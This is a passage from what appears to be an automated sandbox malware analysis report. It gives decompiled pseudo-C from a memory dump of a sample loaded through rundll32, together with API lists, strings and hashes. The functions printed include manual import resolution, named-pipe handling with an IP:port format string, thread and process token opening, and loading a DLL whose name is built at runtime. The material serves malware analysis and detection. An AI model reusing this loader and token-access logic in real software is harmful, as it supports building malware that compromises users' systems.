            							}
            							_t147 = 1;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								L28:
            								_t129 = E04451D97(E0445A102( *_t199, __eflags), _t127, _v184, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t129;
            								E04459E22( &_v176);
            								goto L30;
            							}
            							_v204 = _t127;
            							do {
            								_t132 = E04459A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0445A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
            								_t182 = _v204;
            								_t147 = _t147 + 1;
            								 *_t182 = _t132;
            								_v204 = _t182 + 4;
            								__eflags = _t147 - _t205;
            							} while (__eflags < 0);
            							_t127 = _v188;
            							goto L28;
            						}
            						_t133 = _t118 - 3;
            						if(_t133 == 0) {
            							_push(0);
            							_push(0);
            							_t195 = 5;
            							E0445D297(_t195);
            							 *0x446f9a8 = 1;
            							_v172 = 1;
            							goto L56;
            						}
            						_t136 = _t133;
            						if(_t136 == 0) {
            							_t84 = E044609A1( &_v200);
            							goto L16;
            						}
            						if(_t136 != 1) {
            							goto L56;
            						}
            						E044609A1( &_v200);
            						goto L12;
            					}
            				}
            				return 0;
            			}

            APIs
            • GetLastError.KERNEL32 ref: 044537AB
              • Part of subcall function 0445D297: FlushFileBuffers.KERNEL32(00000000,?,04453ABB,00000000,00000004), ref: 0445D2DD
            • DisconnectNamedPipe.KERNEL32 ref: 04453AF8
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: 4e61b633f812711b8b2d7d40644f5c8056e45b6306592989a9735585ef288c03
            • Instruction ID: 7fc0c868197c8fdb76d932498914ff471f646beb7e62527716b7cc18ea354077
            • Opcode Fuzzy Hash: 4e61b633f812711b8b2d7d40644f5c8056e45b6306592989a9735585ef288c03
            • Instruction Fuzzy Hash: 9BA1B3B1508301AFEF14EF65D884A2BB7E8EB84354F04491FFD55962A2EB34E9098B52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E0446376C(signed int __eax, void* __ecx, intOrPtr _a4) {
            				intOrPtr* _v8;
            				signed int* _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				struct HINSTANCE__* _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				struct HINSTANCE__* _v48;
            				intOrPtr _v52;
            				signed int _v56;
            				intOrPtr _v60;
            				signed int _v64;
            				signed int _t109;
            				signed int _t112;
            				signed int _t115;
            				void* _t163;
            				void* _t167;
            
            				_t167 = __ecx;
            				_v44 = _v44 & 0x00000000;
            				if(_a4 != 0) {
            					_v48 = GetModuleHandleA("kernel32.dll");
            					_v40 = E0445F024(_t167, _v48, "GetProcAddress");
            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            					_v32 = _v52;
            					_t109 = 8;
            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
            						L24:
            						return 0;
            					}
            					_v56 = 0x80000000;
            					_t112 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_v8 = _v8 + 0x14;
            					}
            					_t115 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_t34 = _v8 + 0xc; // 0xffff
            						_v36 = LoadLibraryA( *_t34 + _a4);
            						if(_v36 != 0) {
            							if( *_v8 == 0) {
            								_t43 = _v8 + 0x10; // 0xb8
            								_v12 =  *_t43 + _a4;
            							} else {
            								_v12 =  *_v8 + _a4;
            							}
            							_v28 = _v28 & 0x00000000;
            							while( *_v12 != 0) {
            								_v24 = _v24 & 0x00000000;
            								_v16 = _v16 & 0x00000000;
            								_v64 = _v64 & 0x00000000;
            								_v20 = _v20 & 0x00000000;
            								if(( *_v12 & _v56) == 0) {
            									_v60 =  *_v12 + _a4;
            									_v20 = _v60 + 2;
            									_t73 = _v8 + 0x10; // 0xb8
            									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
            									_v16 = _v40(_v36, _v20);
            								} else {
            									_v24 =  *_v12;
            									_v20 = _v24 & 0x0000ffff;
            									_v16 = _v40(_v36, _v20);
            								}
            								if(_v24 != _v16) {
            									_v44 = _v44 + 1;
            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
            										 *_v12 = _v16;
            									} else {
            										_t89 = _v8 + 0x10; // 0xb8
            										 *( *_t89 + _a4 + _v28) = _v16;
            									}
            								}
            								_v12 =  &(_v12[1]);
            								_v28 = _v28 + 4;
            							}
            							_v8 = _v8 + 0x14;
            							continue;
            						}
            						_t163 = 0xfffffffd;
            						return _t163;
            					}
            					goto L24;
            				}
            				return __eax | 0xffffffff;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 04463789
            • LoadLibraryA.KERNEL32(00000000), ref: 04463822
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: b6344fd5776f79e4e5e24725d974bf44b1be6e03923eb9d937bd75eeac8dde25
            • Instruction ID: 6c5ad0cb0f807e9836731de2dbe5fcce35ab083a7f08a5d3bc68349a3700d632
            • Opcode Fuzzy Hash: b6344fd5776f79e4e5e24725d974bf44b1be6e03923eb9d937bd75eeac8dde25
            • Instruction Fuzzy Hash: B0618C75A00249EFDF10CF98C485BADBBF1BB08315F24849AE816AB391D374AA85DF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 99%
            			E04464160(int _a4, signed int _a8) {
            				int _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void* __esi;
            				void* _t137;
            				signed int _t141;
            				intOrPtr* _t142;
            				signed int _t145;
            				signed int _t146;
            				intOrPtr _t151;
            				intOrPtr _t161;
            				intOrPtr _t162;
            				intOrPtr _t167;
            				intOrPtr _t170;
            				signed int _t172;
            				intOrPtr _t173;
            				int _t184;
            				intOrPtr _t185;
            				intOrPtr _t188;
            				signed int _t189;
            				void* _t195;
            				int _t202;
            				int _t208;
            				intOrPtr _t217;
            				signed int _t218;
            				int _t219;
            				intOrPtr _t220;
            				signed int _t221;
            				signed int _t222;
            				int _t224;
            				int _t225;
            				signed int _t227;
            				intOrPtr _t228;
            				int _t232;
            				int _t234;
            				signed int _t235;
            				int _t239;
            				void* _t240;
            				int _t245;
            				int _t252;
            				signed int _t253;
            				int _t254;
            				void* _t257;
            				void* _t258;
            				int _t259;
            				intOrPtr _t260;
            				int _t261;
            				signed int _t269;
            				signed int _t271;
            				intOrPtr* _t272;
            				void* _t273;
            
            				_t253 = _a8;
            				_t272 = _a4;
            				_t3 = _t272 + 0xc; // 0x452bf84d
            				_t4 = _t272 + 0x2c; // 0x8df075ff
            				_t228 =  *_t4;
            				_t137 =  *_t3 + 0xfffffffb;
            				_t229 =  <=  ? _t137 : _t228;
            				_v16 =  <=  ? _t137 : _t228;
            				_t269 = 0;
            				_a4 =  *((intOrPtr*)( *_t272 + 4));
            				asm("o16 nop [eax+eax]");
            				while(1) {
            					_t8 = _t272 + 0x16bc; // 0x5d08408b
            					_t141 =  *_t8 + 0x2a >> 3;
            					_v12 = 0xffff;
            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
            					if(_t217 < _t141) {
            						break;
            					}
            					_t11 = _t272 + 0x6c; // 0x51ec8b55
            					_t12 = _t272 + 0x5c; // 0xee85000
            					_t245 =  *_t11 -  *_t12;
            					_v8 = _t245;
            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
            					_t247 =  <  ? _t195 : _v12;
            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
            					if(_t227 >= _v16) {
            						L7:
            						if(_t253 != 4) {
            							L10:
            							_t269 = 0;
            							__eflags = 0;
            						} else {
            							_t285 = _t227 - _t195;
            							if(_t227 != _t195) {
            								goto L10;
            							} else {
            								_t269 = _t253 - 3;
            							}
            						}
            						E04467180(_t272, _t272, 0, 0, _t269);
            						_t18 = _t272 + 0x14; // 0xc703f045
            						_t19 = _t272 + 8; // 0x8d000040
            						 *( *_t18 +  *_t19 - 4) = _t227;
            						_t22 = _t272 + 0x14; // 0xc703f045
            						_t23 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
            						_t26 = _t272 + 0x14; // 0xc703f045
            						_t27 = _t272 + 8; // 0x8d000040
            						 *( *_t26 +  *_t27 - 2) =  !_t227;
            						_t30 = _t272 + 0x14; // 0xc703f045
            						_t31 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
            						E04465EE0(_t285,  *_t272);
            						_t202 = _v8;
            						_t273 = _t273 + 0x14;
            						if(_t202 != 0) {
            							_t208 =  >  ? _t227 : _t202;
            							_v8 = _t208;
            							_t36 = _t272 + 0x38; // 0xf47d8bff
            							_t37 = _t272 + 0x5c; // 0xee85000
            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
            							_t273 = _t273 + 0xc;
            							_t252 = _v8;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
            							_t227 = _t227 - _t252;
            						}
            						if(_t227 != 0) {
            							E04466020( *_t272,  *( *_t272 + 0xc), _t227);
            							_t273 = _t273 + 0xc;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
            						}
            						_t253 = _a8;
            						if(_t269 == 0) {
            							continue;
            						}
            					} else {
            						if(_t227 != 0 || _t253 == 4) {
            							if(_t253 != 0 && _t227 == _t195) {
            								goto L7;
            							}
            						}
            					}
            					break;
            				}
            				_t142 =  *_t272;
            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
            				_a4 = _t232;
            				if(_t232 == 0) {
            					_t83 = _t272 + 0x6c; // 0x51ec8b55
            					_t254 =  *_t83;
            				} else {
            					_t59 = _t272 + 0x2c; // 0x8df075ff
            					_t224 =  *_t59;
            					if(_t232 < _t224) {
            						_t65 = _t272 + 0x3c; // 0x830cc483
            						_t66 = _t272 + 0x6c; // 0x51ec8b55
            						_t260 =  *_t66;
            						__eflags =  *_t65 - _t260 - _t232;
            						if( *_t65 - _t260 <= _t232) {
            							_t67 = _t272 + 0x38; // 0xf47d8bff
            							_t261 = _t260 - _t224;
            							 *(_t272 + 0x6c) = _t261;
            							memcpy( *_t67,  *_t67 + _t224, _t261);
            							_t70 = _t272 + 0x16b0; // 0x8508458b
            							_t188 =  *_t70;
            							_t273 = _t273 + 0xc;
            							_t232 = _a4;
            							__eflags = _t188 - 2;
            							if(_t188 < 2) {
            								_t189 = _t188 + 1;
            								__eflags = _t189;
            								 *(_t272 + 0x16b0) = _t189;
            							}
            						}
            						_t73 = _t272 + 0x38; // 0xf47d8bff
            						_t74 = _t272 + 0x6c; // 0x51ec8b55
            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
            						_t225 = _a4;
            						_t273 = _t273 + 0xc;
            						_t76 = _t272 + 0x6c;
            						 *_t76 =  *(_t272 + 0x6c) + _t225;
            						__eflags =  *_t76;
            						_t78 = _t272 + 0x6c; // 0x51ec8b55
            						_t184 =  *_t78;
            						_t79 = _t272 + 0x2c; // 0x8df075ff
            						_t239 =  *_t79;
            					} else {
            						 *(_t272 + 0x16b0) = 2;
            						_t61 = _t272 + 0x38; // 0xf47d8bff
            						memcpy( *_t61,  *_t142 - _t224, _t224);
            						_t62 = _t272 + 0x2c; // 0x8df075ff
            						_t184 =  *_t62;
            						_t273 = _t273 + 0xc;
            						_t225 = _a4;
            						_t239 = _t184;
            						 *(_t272 + 0x6c) = _t184;
            					}
            					_t254 = _t184;
            					 *(_t272 + 0x5c) = _t184;
            					_t81 = _t272 + 0x16b4; // 0x830a74c0
            					_t185 =  *_t81;
            					_t240 = _t239 - _t185;
            					_t241 =  <=  ? _t225 : _t240;
            					_t242 = ( <=  ? _t225 : _t240) + _t185;
            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
            				}
            				if( *(_t272 + 0x16c0) < _t254) {
            					 *(_t272 + 0x16c0) = _t254;
            				}
            				if(_t269 == 0) {
            					_t218 = _a8;
            					__eflags = _t218;
            					if(_t218 == 0) {
            						L34:
            						_t89 = _t272 + 0x3c; // 0x830cc483
            						_t219 =  *_t272;
            						_t145 =  *_t89 - _t254 - 1;
            						_a4 =  *_t272;
            						_t234 = _t254;
            						_v16 = _t145;
            						_v8 = _t254;
            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
            							_v8 = _t254;
            							_t95 = _t272 + 0x5c; // 0xee85000
            							_a4 = _t219;
            							_t234 = _t254;
            							_t97 = _t272 + 0x2c; // 0x8df075ff
            							__eflags =  *_t95 -  *_t97;
            							if( *_t95 >=  *_t97) {
            								_t98 = _t272 + 0x2c; // 0x8df075ff
            								_t167 =  *_t98;
            								_t259 = _t254 - _t167;
            								_t99 = _t272 + 0x38; // 0xf47d8bff
            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
            								 *(_t272 + 0x6c) = _t259;
            								memcpy( *_t99, _t167 +  *_t99, _t259);
            								_t103 = _t272 + 0x16b0; // 0x8508458b
            								_t170 =  *_t103;
            								_t273 = _t273 + 0xc;
            								__eflags = _t170 - 2;
            								if(_t170 < 2) {
            									_t172 = _t170 + 1;
            									__eflags = _t172;
            									 *(_t272 + 0x16b0) = _t172;
            								}
            								_t106 = _t272 + 0x2c; // 0x8df075ff
            								_t145 = _v16 +  *_t106;
            								__eflags = _t145;
            								_a4 =  *_t272;
            								_t108 = _t272 + 0x6c; // 0x51ec8b55
            								_t234 =  *_t108;
            								_v8 = _t234;
            							}
            						}
            						_t255 = _a4;
            						_t220 =  *((intOrPtr*)(_a4 + 4));
            						__eflags = _t145 - _t220;
            						_t221 =  <=  ? _t145 : _t220;
            						_t146 = _t221;
            						_a4 = _t221;
            						_t222 = _a8;
            						__eflags = _t146;
            						if(_t146 != 0) {
            							_t114 = _t272 + 0x38; // 0xf47d8bff
            							E04466020(_t255,  *_t114 + _v8, _t146);
            							_t273 = _t273 + 0xc;
            							_t117 = _t272 + 0x6c;
            							 *_t117 =  *(_t272 + 0x6c) + _a4;
            							__eflags =  *_t117;
            							_t119 = _t272 + 0x6c; // 0x51ec8b55
            							_t234 =  *_t119;
            						}
            						__eflags =  *(_t272 + 0x16c0) - _t234;
            						if( *(_t272 + 0x16c0) < _t234) {
            							 *(_t272 + 0x16c0) = _t234;
            						}
            						_t122 = _t272 + 0x16bc; // 0x5d08408b
            						_t123 = _t272 + 0xc; // 0x452bf84d
            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
            						__eflags = _t257 - 0xffff;
            						_t258 =  >  ? 0xffff : _t257;
            						_t124 = _t272 + 0x2c; // 0x8df075ff
            						_t151 =  *_t124;
            						_t125 = _t272 + 0x5c; // 0xee85000
            						_t235 = _t234 -  *_t125;
            						__eflags = _t258 - _t151;
            						_t152 =  <=  ? _t258 : _t151;
            						__eflags = _t235 - ( <=  ? _t258 : _t151);
            						if(_t235 >= ( <=  ? _t258 : _t151)) {
            							L49:
            							__eflags = _t235 - _t258;
            							_t154 =  >  ? _t258 : _t235;
            							_a4 =  >  ? _t258 : _t235;
            							__eflags = _t222 - 4;
            							if(_t222 != 4) {
            								L53:
            								_t269 = 0;
            								__eflags = 0;
            							} else {
            								_t161 =  *_t272;
            								__eflags =  *(_t161 + 4);
            								_t154 = _a4;
            								if( *(_t161 + 4) != 0) {
            									goto L53;
            								} else {
            									__eflags = _t154 - _t235;
            									if(_t154 != _t235) {
            										goto L53;
            									} else {
            										_t269 = _t222 - 3;
            									}
            								}
            							}
            							_t131 = _t272 + 0x38; // 0xf47d8bff
            							_t132 = _t272 + 0x5c; // 0xee85000
            							E04467180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
            							_t134 = _t272 + 0x5c;
            							 *_t134 =  *(_t272 + 0x5c) + _a4;
            							__eflags =  *_t134;
            							E04465EE0( *_t134,  *_t272);
            						} else {
            							__eflags = _t235;
            							if(_t235 != 0) {
            								L46:
            								__eflags = _t222;
            								if(_t222 != 0) {
            									_t162 =  *_t272;
            									__eflags =  *(_t162 + 4);
            									if( *(_t162 + 4) == 0) {
            										__eflags = _t235 - _t258;
            										if(_t235 <= _t258) {
            											goto L49;
            										}
            									}
            								}
            							} else {
            								__eflags = _t222 - 4;
            								if(_t222 == 4) {
            									goto L46;
            								}
            							}
            						}
            						asm("sbb edi, edi");
            						_t271 =  ~_t269 & 0x00000002;
            						__eflags = _t271;
            						return _t271;
            					} else {
            						__eflags = _t218 - 4;
            						if(_t218 == 4) {
            							goto L34;
            						} else {
            							_t173 =  *_t272;
            							__eflags =  *(_t173 + 4);
            							if( *(_t173 + 4) != 0) {
            								goto L34;
            							} else {
            								_t88 = _t272 + 0x5c; // 0xee85000
            								__eflags = _t254 -  *_t88;
            								if(_t254 !=  *_t88) {
            									goto L34;
            								} else {
            									return 1;
            								}
            							}
            						}
            					}
            				} else {
            					return 3;
            				}
            			}

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction ID: c258453cb33296875341aecad9ea9a2cb40563468fbecd199e2f466032c2028b
            • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction Fuzzy Hash: 83D112756006009FDF24CF6DC9C596AB7E1AF88348B24892EE88AC7705D731F9458B5A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0445C92F(void* __ecx) {
            				void* _v8;
            				void* _t10;
            				intOrPtr _t13;
            
            				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
            					L4:
            					_t10 = _v8;
            				} else {
            					if(GetLastError() != 0x3f0) {
            						L3:
            						_t10 = 0;
            					} else {
            						_t13 =  *0x446f8d0; // 0x450f8c0
            						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
            							goto L4;
            						} else {
            							goto L3;
            						}
            					}
            				}
            				return _t10;
            			}

            APIs
            • GetCurrentThread.KERNEL32 ref: 0445C942
            • OpenThreadToken.ADVAPI32(00000000,?,?,0445CA74,00000000,04450000), ref: 0445C949
            • GetLastError.KERNEL32(?,?,0445CA74,00000000,04450000), ref: 0445C950
            • OpenProcessToken.ADVAPI32(00000000,?,?,0445CA74,00000000,04450000), ref: 0445C975
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: OpenThreadToken$CurrentErrorLastProcess
            • String ID:
            • API String ID: 1515895013-0
            • Opcode ID: 6c462484898afd8cfe3cce78c8ae242791a11853f0a818f8d52f86780fe0d144
            • Instruction ID: 6304ae483b5fcc8a147be627e2feae48f0f118a0ff30bd294962cb2a45e2af1e
            • Opcode Fuzzy Hash: 6c462484898afd8cfe3cce78c8ae242791a11853f0a818f8d52f86780fe0d144
            • Instruction Fuzzy Hash: 5FF03A72A00605EBEF109FB4D849FAA73ECFB08600F001492EA46D3161E774FD048B61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E0445D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
            				char _v8;
            				char _v12;
            				char _v140;
            				signed char _t14;
            				char _t15;
            				intOrPtr _t20;
            				void* _t25;
            				intOrPtr _t26;
            				intOrPtr _t32;
            				WCHAR* _t34;
            				intOrPtr _t35;
            				struct HINSTANCE__* _t37;
            				intOrPtr _t38;
            				intOrPtr _t46;
            				void* _t47;
            				intOrPtr _t50;
            				void* _t60;
            				void* _t61;
            				char _t62;
            				void* _t65;
            				intOrPtr _t66;
            				char _t68;
            
            				_t65 = __esi;
            				_t61 = __edi;
            				_t47 = __ebx;
            				_t50 =  *0x446f8d4; // 0x450fc00
            				_t1 = _t50 + 0x1898; // 0x0
            				_t14 =  *_t1;
            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
            					_t15 = E04459F85(_t50, 0xb9d);
            					_t66 =  *0x446f8d4; // 0x450fc00
            					_t62 = _t15;
            					_t67 = _t66 + 0xb0;
            					_v8 = _t62;
            					E04459FE4( &_v140, 0x40, L"%08x", E0445E34A(_t66 + 0xb0, E0445A5D0(_t66 + 0xb0), 0));
            					_t20 =  *0x446f8d4; // 0x450fc00
            					_t7 = _t20 + 0xa8; // 0x1
            					asm("sbb eax, eax");
            					_t25 = E04459F85(_t67, ( ~( *_t7) & 0xfffffeb6) + 0xded);
            					_t26 =  *0x446f8d4; // 0x450fc00
            					_t68 = E04459C50(_t26 + 0x1020);
            					_v12 = _t68;
            					E04458D9A( &_v8);
            					_t32 =  *0x446f8d4; // 0x450fc00
            					_t34 = E04459C50(_t32 + 0x122a);
            					 *0x446f9d4 = _t34;
            					_t35 =  *0x446f8d0; // 0x450f8c0
            					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x446c9d8,  &_v140, ".", L"dll", 0, 0x446c9d8, _t25, 0x446c9d8, _t62, 0, _t61, _t65, _t47);
            					_t37 = LoadLibraryW( *0x446f9d4);
            					 *0x446f9cc = _t37;
            					if(_t37 == 0) {
            						_t38 = 0;
            					} else {
            						_push(_t37);
            						_t60 = 0x28;
            						_t38 = E0445F08E(0x446cbc4, _t60);
            					}
            					 *0x446f9d0 = _t38;
            					E04458DDF( &_v12, 0xfffffffe);
            					E04458F63( &_v140, 0, 0x80);
            					if( *0x446f9d0 != 0) {
            						goto L10;
            					} else {
            						E04458DDF(0x446f9d4, 0xfffffffe);
            						goto L8;
            					}
            				} else {
            					L8:
            					if( *0x446f9d0 == 0) {
            						_t46 =  *0x446f908; // 0x450fa00
            						 *0x446f9d0 = _t46;
            					}
            					L10:
            					return 1;
            				}
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: 7b35645f2ecc05e6d49bcd383f8847a14897891319b26da54300dcd5c9ef377e
            • Instruction ID: a46a3172720312265ddf4eaba7a3b3e57bdea603ee55b3acbc2e01c7deb4b925
            • Opcode Fuzzy Hash: 7b35645f2ecc05e6d49bcd383f8847a14897891319b26da54300dcd5c9ef377e
            • Instruction Fuzzy Hash: 423175B2A00604FBFF10AB69EC45F5A32ECEB45618F14416BF949D7192DF38BD488B52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E044636D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
            				char _v5;
            				long long _v12;
            				short _v20;
            				signed int _t15;
            				void* _t16;
            				signed int _t22;
            				char _t25;
            				void* _t26;
            				signed int _t28;
            				intOrPtr _t29;
            				void* _t31;
            				char** _t32;
            				long long _t40;
            				long long _t41;
            
            				_t40 = __fp0;
            				_t15 = E044635EE(_a4);
            				 *_t32 = "msxml32.dll";
            				_t28 = _t15 & 0x0fffffff;
            				_t16 = E0445A5D0();
            				_t26 = 0xf;
            				_t25 = 0;
            				_v5 = 0;
            				if(_t16 > _t26) {
            					L2:
            					_t3 = _t25 + 0x41; // 0x41
            					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
            					_t25 = _t25 + 1;
            				} else {
            					_t26 = _t16;
            					if(_t26 != 0) {
            						do {
            							goto L2;
            						} while (_t25 < _t26);
            					}
            				}
            				lstrlenW( &_v20);
            				_t29 = _a8;
            				_t22 = _a12 - _t29 + 1;
            				_a12 = _t22;
            				asm("fild dword [ebp+0x10]");
            				if(_t22 < 0) {
            					_t40 = _t40 +  *0x446cf90;
            				}
            				_a12 = _t28;
            				_v12 = _t40;
            				_t41 = _v12;
            				asm("fild dword [ebp+0x10]");
            				if(_t28 < 0) {
            					_t41 = _t41 +  *0x446cf90;
            				}
            				_v12 = _t41;
            				asm("fmulp st1, st0");
            				L04468995();
            				return _t29 - _t22;
            			}

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 0446371C
            • _ftol2_sse.MSVCRT ref: 0446375F
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: 18dbaf781ce2a09ca94abcd8221a6e6974386771e8ac56f3d0f6b5304ce5358c
            • Instruction ID: 702a88be912072da4474c0aad0bd2f8935f2e8e6b438e85ef66a42407c6aff8a
            • Opcode Fuzzy Hash: 18dbaf781ce2a09ca94abcd8221a6e6974386771e8ac56f3d0f6b5304ce5358c
            • Instruction Fuzzy Hash: 9D1108B2A00289EBDF009F69E8044DE7FB5FF84314F26866ADC5696246EB70E5648342
            Uniqueness

            Uniqueness Score: -1.00%